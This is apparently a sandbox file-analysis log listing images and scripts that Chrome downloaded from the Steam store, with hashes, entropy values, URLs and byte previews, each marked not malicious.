        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, baseline, precision 8, 600x336, components 3
        Category:downloaded
        Size (bytes):75786
        Entropy (8bit):7.976535150016609
        Encrypted:false
        SSDEEP:1536:iX+oXnB8wFhOGbvv8eTmyAnC+UaxHZw0fMdBaxe5p94JJuxgYYKx4fs:ihXB8wB8G+j3VuMxPJKOHs
        MD5:0F1B5A9BE61C0A9B13479CFD7533B395
        SHA1:805F3A5A82EAA72E5656EB6817FF66A3AC905F6F
        SHA-256:DE0252AFF8D5D29C376FA06B059B454C8500098595220379B7E652EC3769B7FB
        SHA-512:982F847EBDF8046197407C5B5BC5F93FDAB77412D70A8C1F375A19C9D8DE1076791F13CDBE1AF71A23947E6F4EFCB2C3622471D9EE5348694C42D7BC568460FB
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/3008050/ss_2ebe048e4d5d386deed4ca994dd88c014a70b4dd.600x338.jpg
        Preview:......JFIF.....%.%.....C....................................................................C.......................................................................P.X............................................g..........................!1AQ.."a.2Bq....R..#b...$%34CDSr....&E........56TUVcsu...'7dt..FGe......W...................................H.......................!1..AQ.aq...."R......23S.#4Bb..r.$C.5...T...%Dc............?...a.gi...e..%A.."....ks.>........Q.ei+2.@..~a.`..<....J..../.2bp.1.F.w....i.c+....n..3.X..U.....>........~...../....r..^._m........c.m|.<.%..]q.U..=...O....mr....U..1...f.....ee.....irH......<4*T...<.Z$yl~....8R......1.n..E..G..............1.p\}b....G..\........~..:^..mTh....,.M.KPBT....c.;V.....-.Eiw..v=...K...Z.7..P*}..].L.i...Z...BH......=..b`....y......q...%........L90..ydfQ.....H....ZNu(]...d...{..H..5...a..Z.(Am$[.j.....)Y...'......%.;-..j.~Z...S....../p>">}..8...;w.....u...m_..o....u..>.B..m.......J{.....]....q.nJv].~....Q.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:downloaded
        Size (bytes):19465707
        Entropy (8bit):7.791039468063003
        Encrypted:false
        SSDEEP:393216:bTFXUpXoXJtBp/6kf4W4Es8nZFyqGcz9R4OH/kjX0j+:FXocb/6tWdZZcARIX0j+
        MD5:2F0527AD119884F67F4919168C986C7F
        SHA1:39CE39ADF37A6BE3FB8CE328C7E5ABB79C750C1A
        SHA-256:675CF6ECE963C633B99790AEA0D814826E757C873167792139EBCCA59AAD8880
        SHA-512:1D6B76FAABB3CB4595472622F34285066A070419CC3534AD1348CB287C7445ECB03015B94E624FBD64308F864329929B9CCFC41A5D8A54F553D544D9ADEF3479
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/S.T.A.L.K.E.R.2_artifact_hunting.gif?t=1705420866
        Preview:GIF89aj.\...1..................................................................................................................... .. .. .. .. ..!..!..!..".."..#..#..#..$..$..$..%..% .%".&".( .(".(# )$.*!.*#.+&.,# ,&!,&$-)&0% 1".1%.1&.1)&2..2'#2)"2*(3..3+$3+&3,.3, 3,"3,)4.)5.,6/&81+82.841;0-;2+<1+<3)<3/=!.=-"=0%=5-=61>83?:6@1,@6.@7-A,.A5*A71A90A:6C8,C9/C:5C;1C>9D,#D6)D<9E:1E;4E;4F4*F9/F<8F?;G9-G<9G>3G?8H>9H@>I2'I=8I@2J<+J?3J@+J@0J@5J@<LC?LFCMB7MC;N;'ND9O!.O:4OE?PHDQC.QG;QG@RHDSLHTJ?VLEWMIWPIZQJZTP]RK^UP_VKa.!aWPa\WbYOf[Nf\Pf\Qf^Xg..gVHg]Rg]TkaUkaXkc]mcXneYng`oidqgZqi^tj^ukbwnbwohysjzpc}re}sg~ti.um.xo.xl.zp.zn.{o.zm.~t.~q..y..t.wl..t..y..u..}.....y..v..y..z..{..}..~.............T1.....................................D.................................................Y..U.!..NETSCAPE2.0.....!.......,....j.\....................................................................................................................... .. .. .. .. ..!..!..!..".."..#..#..#..$..$..$..%..% .%".&".( .("
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, progressive, precision 8, 306x350, components 3
        Category:downloaded
        Size (bytes):175847
        Entropy (8bit):7.975914005925516
        Encrypted:false
        SSDEEP:3072:47jmQ3UOnl9XiR8pNFg/i+RfCRc5tRmooI8mlOBaXOmUuw3WjSKV0hQBcJrD2MVk:AmQEkXiR8wMc53zjXRe3LqF4rDxV0FPJ
        MD5:BD6E8B82C3E6C18507EB3ECF041E4D8E
        SHA1:425C630ECC943D0DD9105A7FD1800E31D40CEF0F
        SHA-256:C214EF90D880175CDF66EBCD9421643DB2C35B6E0D95235AE579D3E8A05E3E40
        SHA-512:6E63BB89EFF02B578939A8025A1D3270A580BDAF3D9B3BFF203EC4BDAF5FB3F37791576C61C53178E7095F93D6959753EFE566027364FB2C050A9EDBA647A60D
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/spotlights/5dcb5d9c6d41e2569631f4d4/spotlight_image_english.jpg?t=1708639824
        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1430
        Entropy (8bit):6.915444207165524
        Encrypted:false
        SSDEEP:24:2C1hkyaWwjx82lY2T3RVag7yJ3VR7GmXF54+mC8yq8/23CMwMIE+b8Dllc:HZNn2lpWJ3nnwDNmlPbUI
        MD5:AFC159FE5F0F26FA7282505DA9887CC3
        SHA1:C1CD55380C2AF435876989F94E8B0715042C2ADE
        SHA-256:4BE942A34871DD6F8F14B43D27C31B049BE7F6544C05685D4F35ABDD329DE176
        SHA-512:8F7DCB7E99CEED8F86575A05FF7D329EE2FC67CD18C6D53B2833A6AA1EEDE2586D57688F27901D941D2B6351412957468CCE5CA69101D86911390BF04FD82763
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...'iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)" xmpMM:InstanceID="xmp.iid:6E745BD792D411EE8F80E4F5B5148EC9" xmpMM:DocumentID="xmp.did:6E745BD892D411EE8F80E4F5B5148EC9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6E745BD592D411EE8F80E4F5B5148EC9" stRef:documentID="xmp.did:6E745BD692D411EE8F80E4F5B5148EC9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>{KL.....IDATx.b..U.d``.......@...4.....0.4.9...[`...e.5U...6V..G..d.....I2.].......?y.............^./....&.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):13383
        Entropy (8bit):7.942833869090401
        Encrypted:false
        SSDEEP:384:D3aWR6/lOmAcrMjgqwCkl7Xo8e+Mv+7jj:7D64mVgkl7XHe+s+7n
        MD5:446A78CEFE79E831B1DBF80AF5026054
        SHA1:27C695664B3BF3EB96672A5C27B4B6EB55B3811A
        SHA-256:1DF16E5BC981794D415B0083B4BC5B99CD14793523D5C58B0D2BFF631B7CA704
        SHA-512:0199EDEC175FA0B30E80D29995802F11811789D4DE8FA3A3A83934E1C34B1C72117FEBFD665F20E0BF3C25E8CD9191292CCA9798D3A70F1E1C4A207A6AA4EEC4
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/489830/header_292x136.jpg?t=1701807334
        Preview:......JFIF.....H.H.....C....................................................................C.........................................................................$............................................N.......................!...1..AQ."a.q...2B.....#3b....Rr.$Ss..%4CTt......................................#.....................!1A.Q."2aqB.............?..\v.gL....^............2 ;cAB~.......m..ZX...)E...w.0.P.....f._`z..Z...//~....Z..-..}}~X.)..zS...b...}_............`...Z.:`.?.2.3.id.e.)1q%.eA$.........&.NW&..%.f.g3<...r.|dd".P.....4.?......7o...w#.SR....k.s.Q.oxvr.u..r.l;.ON%(v^.+an.....H..\....xMg.QODB......B..I..O.........2...`..y-.o;.....Z.=I.k.R...:.|(..6d.....Cp.....R.3....z....+....c....I,Dt..1.....&.H....Y.........'.sf...x..W.....`.oC..............d.4.Zb..[...O..I........$....u...X....bN..]..........kR..).5.[.. o}.pBi=..~.+........6.|T.....$P..}...........M...U..j#/dVe...9u....Q.>VA=..Z..`z.ju..o..g..yK.s.<;....I.q.%p..!.T... ..r.1..u
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (630)
        Category:downloaded
        Size (bytes):10737
        Entropy (8bit):5.327237293204141
        Encrypted:false
        SSDEEP:96:DIxuZlZJFupWXpi0pGZBnXQd2q7s0ZiZmdUYe3egbwZqw8+mwoChzSBmqZTZ+Z33:kEXdMAFJdUTTE77tYHD4egFj2MFpKHc
        MD5:D86DCDBFED4C273C4742744941259902
        SHA1:98089A33D0CF2FA4B3E1BA9B7EEB9B8BA0AC82A7
        SHA-256:4B4969FA4EF3594324DA2C6D78CE8766FBBC2FD121FFF395AEDF997DB0A99A06
        SHA-512:F10E98F579D36CE13E24DBE3050C09D87F12F94578B80EA1891CA485DB48C83619D93A6B74D99639468A746CCE872AF8742CA4DBCECE7A36CFBF097B96B7EAAD
        Malicious:false
        Reputation:low
        URL:https://cdn.jsdelivr.net/npm/react@18.2.0/umd/react.production.min.js
        Preview:/**. * @license React. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=V&&a[V]||a["@@iterator"];return"function"===typeof a?a:null}function w(a,b,e){this.props=a;this.context=b;this.refs=W;this.updater=e||X}function Y(){}function K(a,b,e){this.props=a;this.context=b;this.refs=W;this.updater=e||X}function Z(a,b,.e){var m,d={},c=null,h=null;if(null!=b)for(m in void 0!==b.ref&&(h=b.ref),void 0!==b.key&&(c=""+b.key),b)aa.call(b,m)&&!ba.hasOwnProperty(m)&&(d[m]=b[m]);var l=arguments.length-2;if(1===l)d.children=e;else if(1<l){for(var f=Array(l),k=0;k<l;k++)f[k
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):11386
        Entropy (8bit):7.945456271396874
        Encrypted:false
        SSDEEP:192:AsQWVoCK2mOpgWlO3oah3k7PJH9l/JUNZAHm2lQflodGNjY/lH5qq10m7zhFgvyc:Ah2o27s3oahk7PJHL/CHlSdMjY/R5P10
        MD5:2C4853B1A11A4D43959FEAFDC4D8385B
        SHA1:54F539BC34B0FC6DB23E4EB9AEBF1CF7B0E2CF5E
        SHA-256:DC7E6315D504A72691BF124B529FFB9326A7AE1243CB555B2E0A2AD6A7725E91
        SHA-512:C27F828D30171DFC95CF4459E90CE1F91D8CAD57375DF4DAD544B06F50B3F804A3DF472D3795EF6153EF9635A658C67FF60982D6684D2EB1940D217D19B8B344
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................;..........................!..1A.."Qa2.#q...3BR...b....t...................................=.......................!1A..Qa"q........2...#B..Rr...bs................?..*.......s]...z.7(..]w......1........d)...>.....~.PH.Q9......d8V.].....P..o......:....5.~..s..-T.[.Bc.J..RF..\u7..$..i.}+(..x...y.@=.:.R..I..4.....q...m.}........f^e9)J......:. .Q.eY..J-....#d%.$...*........)..I.W:H..i.u..|..S!TWY............{.n..".n.W.....G~.|...Z....$D 4.Tn..$.~.c...oSK8.'.H.k.1.s.4........Y.$)B.......R...-Nr.0....T.^.>.1P..P......].u.` `...C..8yF.a...>t.&..n8...|.)..v.,HH.....i[.&4Wc..?.^.s.....J...t......."..u.I.=....z.h....J.D..4..6TB.7......+ F..T..n@.@..dgQ'..u....M..?AR...}W=E......Z.G.u.....F..]tJw. .I;.7.|.W"1N...,E.q......$X....N.gM..p..}.=...X...U...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):44966
        Entropy (8bit):7.97234887919766
        Encrypted:false
        SSDEEP:768:9aQRa34d3bTMo2EtvSXuuf3jtZLBSZ1koO72vQq7F/kvCy0xtR8KWxuFX+UIG5lT:tR7d3vJDqXuu39SZ6Nq7Rk90x3rWA5lF
        MD5:EE79A6A28F09CD4792EA898BC9250AE1
        SHA1:3D50B12F6510AE3CF6C8352F4823DDE21FFDA69B
        SHA-256:809B65B6946CDDA816F6CC1D72E5A32E8BDD454EE9BEC5C31658F2EDE2D9A7C6
        SHA-512:8DBBFC4A0961CD023FA5975CCA812FDD5062EC200EB43A125BA5CA05C6D756CC466CE91AA2C401B60E1845481C0C24128F61EBA9A0864EE157D737F198294CBE
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C......................................................................................................................W..........................!..1A."Qa.2q#B...R.....$3br......%57Ctu.Tcs......468Vde......................................K.........................!1AQ.."aq..2.....T.....#BR...45br..$3D.%6CSs................?..44..q..}.5...LjYI....K3$n..d..0@.[P.t."....o .....q..- .4F.V....2.c....t(.0.C."@.._.L*.ya=?.E..6#.....@....El...|DayI...Z.s...S...E.B..J67..,r~.`Q......J.L$.}.....J.q.U7N..J.7B..|.%e.|...7#...)..P:...F.......z.0.O"...[..T...i.u....y......a.J...Q.OC...h.K....O..b(.....e..E..).%ZW4.7}..A..:.b.. aQ.D4T.qoL.Ju.....#ql+...42..9...@Q.@.....q.$8..Z..).....R.E...&......+GW.....z...lQ....|....A6.z.....V.I.}^..}.6.@........I{W.iM.....:.Uu#Z......,.&..*z..G1.@n..z.|x..t.uI...-.zb.*..'..'..*.T4.....1...t.Q.......-........O|N.OGZ..w..QL-...j.`.?S../.g..A..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 616 x 1, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1120
        Entropy (8bit):6.456245824682228
        Encrypted:false
        SSDEEP:24:3y1he91Wwjx82lY2T3ouV5uOyJ3VeESGZDGRPrb9kc:3wqQNn2xaFJ3iBec
        MD5:EDB0161B9DB9F6489684D466613502C3
        SHA1:903F5DADE092B44321A6ECF45CFEBD18375164E6
        SHA-256:FD844A25854B8FF87048D44CD4B0D383A6BF3A69AEF5066A04BB1AFD628E1F36
        SHA-512:607927D1ACA226B0C6EAE6ADD27B4962C69478FED6093B5FE736D82F2BD9B83562F4951124449AD7C1CC45CD393FDF9ED7D9736ECB0F182E6755FE1FC668CF4E
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...h.........j.R.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:17658E6BE6CB11E3B5A6BB61795E9834" xmpMM:DocumentID="xmp.did:17658E6CE6CB11E3B5A6BB61795E9834"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:17658E69E6CB11E3B5A6BB61795E9834" stRef:documentID="xmp.did:17658E6AE6CB11E3B5A6BB61795E9834"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>......IDATx.V...@...:T..E.:T..R[..&..... .}<..#..y..}.2d.......D...ct... l..L....^...I.g|..m.M....3>...,.C..d.&.?.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):43095
        Entropy (8bit):7.968374516597565
        Encrypted:false
        SSDEEP:768:U+UJGF5inF0oEh7eoWFxuTjaK6ylPmkJbCQ35YHBNhQ4DWoCQmoN2UWRzXi:U+GGF5int4ezFINzNVCQp2BjQoWoCUTJ
        MD5:C330E9EAF75E55FD694492E91BF05340
        SHA1:7EE9D7CB0E792F43E58E441C5A4D73B1664A5DAF
        SHA-256:EB579F2DCA7761CB25AFF03D707DD85F13574F5897CE6CF8C9BB1202553F6CC9
        SHA-512:85451E7920D53CD9F2F9B90642730F877597752C9CEF266B8AA4DBB29AC0C875B0CA9DCC97DDDDCBA31195B0E83E9553C54167CEF49BB328C39ACEBCCF8D4EC8
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2881650/header.jpg?t=1715689548
        Preview:......JFIF.....,.,.....C....................................................................C.......................................................................................................................Y..........................!..1A."Q.2aq..#B...R..$3Sbr.....8C....%45Vdsv.....cu..&DEt....................................<.....................!..1A..Q.aq..."2.....B..Rb...#r...3..............?...D.S!..X...S..L.&K.?j...!.n$=....h....y..*...I7.}...5..8...........0}....W........*....A....._.."fX.`....-.#..T..d~..-6.9....vrz...dEU..X..8...Q.y......rI.|......qD....U...Y.|.....s.G..|....s.G.A.R_..W....HQS.?.W.{...4.V...I..I.........P.>..{cH.^...i.....W7....gbEV..iN..W.n..^U.:....v...!.j....c.Q.3#..,....(.|.u8....C.I^.;....(.mRCN)..%*.Q...%...........x.%?.U.uZ..X....A....Yd..4.6IS.....u.Q._n..t.]p .N.......*Q#.!..Jw..<..lB...-O............*..4...u....p6.......R...)F.....&HM.%...V.O....V...P....-...lR.....`O..+....V_..P........l....|....u7k...2.qII.|.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):4010
        Entropy (8bit):7.858798553113305
        Encrypted:false
        SSDEEP:96:CE8fW7Ue59/Q3PyLZ0Mmtr50rRWTNJVNlpPn3pHU91c6CTm:CJfy55pQ3P6KMO0rMhFlNnxk1tf
        MD5:4D35C71CF57286BC9F6555CB3EE9F440
        SHA1:F4A1535333B902F4A9949C51DD3B2419C6F6AD11
        SHA-256:5A7E64DD25F1AAF5C90A638EDDCE1EC984496CC819408E22C106CA72FE2AACD3
        SHA-512:E622172608BD2206D94DCC81401788C587276FA0C16DCDDD2BA45C710945BE6DB4A963B886C60EA3D05271865097FC31BD208DA8E72C5D2FBED30E0FCAC40B7A
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E.................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...~T.O........g4.XIedB1....../'......l...=)....l....4.;.'.....C.....}............r3.{....r.C...&.rz..P.&.1..>{U.^.A.pU........F2.o.o.Ll6.....Wp.q.&.......9...`.#..N3.4...<.`......^O...@......\t..M.......R...s.......;.39=s...27\....S.6q......f....N..e?tz.hA......@....);_....q.#.a.U..rHPH# ...km<1m.#.b.W...q....B . ..z......s..8e=h.,Px.....g.......4^.M.l.r
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (22672), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):22838
        Entropy (8bit):4.872557171851413
        Encrypted:false
        SSDEEP:384:+VicfSf4+JAslpN+MhZxEOIqisxp9RO6orsH1XQSmRyeyZ/84t1SSzNQvIkoVMxc:lp4+blpNN7VMxsgE3kSd5/VQ47hD
        MD5:6C901BD882E3F651F217E8B756595286
        SHA1:A4AC60012194FF6850EF3978710C192E4A980174
        SHA-256:7ECB4DCC1E500D3FED9687C38FEC0F5117BBE6CB0D8630B3D25A7CE04A2E21BE
        SHA-512:FDA2BA95C3DFE78476038170259D50782E47D5C4D6D59D11E6ADB1F896687E9329234A58495805AC3CA23C724E9EF4AE56D3FB28AA98E58180A58F64C5035166
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/marketing_english-json.js?contenthash=deef5c040fa6e28f22c9
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[4929],{5:e=>{e.exports=JSON.parse('{"language":"english","label_play_free_until_custom":"Play for free until %1$s.","promo_ends_custom":"Offer ends %1$s.","label_play_free_generic":"Play for Free!","label_free_weekend":"Free Weekend","label_free_week":"Free Week","label_just_updated":"Just Updated","label_for_a_limited_time_only":"FOR A LIMITED TIME ONLY","msg_prepurchase_and_play_beta_now":"Pre-Purchase and Play the Beta Now!","msg_play_beta_now":"PLAY THE BETA NOW!","msg_prepurchase_and_get_beta_access":"Pre-Purchase and get Beta Access","msg_steam_workshop_now_available":"Steam Workshop Now Available","msg_now_with_steam_workshop":"Now with Steam Workshop","msg_now_with_steamworks":"Now with Steamworks","msg_now_available_on_steamos":"Now Available o
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3154
        Entropy (8bit):7.850028804831712
        Encrypted:false
        SSDEEP:96:vWDB/D3QRjh+HwFXPEt+ojwsmZ7CH9hN7kQyPo+qmr:6BDQRjSwFXssmVdyPjqmr
        MD5:6E3C210FD7755AAFE2CDCFF260A2804E
        SHA1:4A713251BB775DCB3E692F88DF38C1EC44A9B909
        SHA-256:0956E6592CFFC0036FB10D425D225FF1DCA47D518CA24155058DD520CF45807A
        SHA-512:1D5A69D3F8E0CA7F8F98EA8D8985F4B73212F995F5A6BCA96020DDE64C8D48C59D5A176FF5D400B13156EB963EC37D0A2334236889989E376C7138B49B99C1B6
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................=..........................!.1AQq..."a.23B.4r.....C..%bs..................................)......................!.1AQ."qa...2................?....U...y.P|Yx...~......Yk!b....&'......P.....).g.z..Db.,a.........Q.X...o...;Kg.R...Q:".J2"..3.V7/0..6.._Z+....tP.!.;.._V..#.[VP....&Y.r..Z..UYn.(K..[.......)I.G/....WVR.v..Hw2.%X.....T.....4.~j-..\&..*.)^Fh..$........<.@.]z..2..k...3.z.8hd.C..'w..X......)a.C.*R.u_J..zc...:..x.X..Z.D.pe....F...s...G.rM.$Tz...gO.gU4}%.D.fS.9..rdxc.Bcb..N.......n..P.....A.m..2..L.G.P.*e.Y..m.$(.e$6..Wh^..8..%*E.X.wg./..\..{TU.&.;....oH.UX(^;.c..t.....`.2&...7..0....v...>.^k....;..VH..H.........x.3.5..?T.....)*....h...f!.vy..v....7'..x...)....&Y._h...g.W)....*..J..FeC.|..\[..U.9d.m...L.2...7......x.w.....1..\..f..BV.1......c
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):251253
        Entropy (8bit):7.985928431865218
        Encrypted:false
        SSDEEP:6144:F27opfjhTOfoDlPEyKBPP5dae3arz0yMPovDlSMo:F20fjaClaFP/5qrz0ycovDlSB
        MD5:A40888F6745168D850589417F6DBD3E8
        SHA1:AF59BCD3CBC35017D07A66A02CB1B96C7DE29644
        SHA-256:94462DE24EE7091411887A7B5BE4A8F653C5615EA27D8B998707372D623FDF1D
        SHA-512:101EC5277F11F069086DBF1402F163DB0578C5B68BD878588C7E79EFAD8F07824AD9F2C6958A1BF07D13D36AAFD5F2170ED76BBE414C6233D1D7450C2CDC11E3
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/guardian.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:25:17+03:00" xmp:ModifyDate="2021-08-03T14:25:17+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:6382e799-92d8-e242-bad7-e23b8fe89675" xmpMM:DocumentID="adobe:docid:photoshop:76e094fa-022a-8342-884b-35de2b365b25" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (319), with CRLF line terminators
        Category:downloaded
        Size (bytes):37151
        Entropy (8bit):5.552661372599106
        Encrypted:false
        SSDEEP:768:DOKZjy90zb/bDvpKtaEYYd/dHb/VntMDOY5jxkooTq351jbdpn5Q1:DTZ290zbzDvFE1Z4Ddbdl5U
        MD5:C9C8BA9C123646E6ABDE113A12EE3A4C
        SHA1:81EF31054685E543475543691178761194A8CE0A
        SHA-256:FA2B078B8AD73C3384D6D55E977A57D64EDFA743A1893083638E9E53D8A67849
        SHA-512:5588EDCEE55859FA8FF4384702E68D347ABA1503B4989C18E73C0F5C8363927D1B736B571B2082B3AF73DD1A046EF100FFDFC9DDBF58921C10D764516887EC70
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/app_tagging.js?v=yci6nBI2Ruar&l=russian&_cdn=cloudflare
        Preview:..function TagLink( tag, language )..{...var url = 'https://store.steampowered.com/tags/';...if ( language )....url += language + '/';...else....url += 'ru/';.....url += encodeURIComponent( tag ).replace( /%2F/g, '/' ) + '/';...return url;..}......function AppTaggingMatchTags( rgTerms, rgTags, rgSuggestions )..{...if ( rgTags && rgTags.length )...{....for ( var i = 0; i < rgTags.length; i++ )....{.....var strNameNormalized = rgTags[i].name_normalized;.....if ( !strNameNormalized ).....{......strNameNormalized = rgTags[i].name_normalized = rgTags[i].name.toLowerCase(); .// @todo: We should use .normalize() when browsers actually support it....................// For now just return the normal value as \W actually just removes entire tags......}.......var bMatch = true;.....for ( var iTerm = 0; iTerm < rgTerms.length; iTerm++ ).....{......if ( strNameNormalized.indexOf( rgTerms[iTerm] ) == -1 )......{.......bMatch = false;.......break;......}.....}.....if ( bMatch ).....{......rgSuggestio
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 240 x 233, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):77465
        Entropy (8bit):7.989301486997796
        Encrypted:false
        SSDEEP:1536:ofou8ANbKTp1iRUc9ILUS0jXOuBmlmq9hr1e+9GUC:oQo/ROLbOBSmChro+9jC
        MD5:AB0C8A953DE00FC983A0CDEB5EB56D88
        SHA1:D506D37C1085D22D36D47DCBB0F6D18B41C8BF87
        SHA-256:36F2192034776FD5699EFC4434D30977390DC3CC9B5DA42983A095AEC2364E5B
